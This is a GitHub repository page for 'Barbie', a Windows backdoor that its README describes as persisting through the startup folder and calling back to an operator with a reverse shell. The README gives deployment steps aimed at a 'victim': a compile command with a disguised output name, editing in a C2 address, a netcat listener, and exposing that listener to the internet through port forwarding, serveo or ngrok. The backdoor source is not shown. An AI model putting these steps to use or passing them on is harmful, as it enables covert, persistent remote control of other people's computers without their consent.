Skip to content

komodoooo/Barbie

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
LICENSE
LICENSE
 
 
README.md
README.md
 
 
barbie.c
barbie.c
 
 

Repository files navigation

Barbie

A simple, persisent windows toy backdoor spawning a reverse shell.

Once the victim starts the executable it locates itself on default startup programs directory,
then it tries to connect to establish a connection every 30 seconds.

Setup

Edit the 8 and 9 lines with your own C2 server and port.

Compile

gcc barbie.c -o startupsrvc -w -lws2_32 -mwindows

Setting up your machine as a momentary C2 server

  1. First start a TCP listener on your localhost for incoming connections.
    With netcat: nc -lvnp <PORT>
  2. Now you have to expose your localhost on the internet, there are various methods to do this:
    • Setting up port forwarding by opening the choosen port on your modem router
    • Using serveo to start a SSH tunnel: ssh -R <SERVEO PORT>:localhost:<PORT> serveo.net
    • Using ngrok to start a TCP tunnel: ngrok tcp <PORT>

Post exploitation

Here

About

A simple, persisent windows backdoor

Topics

backdoor malware-sample windows-reverse-shell

Resources

Readme

License

Unlicense license
Activity

Stars

1 star

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages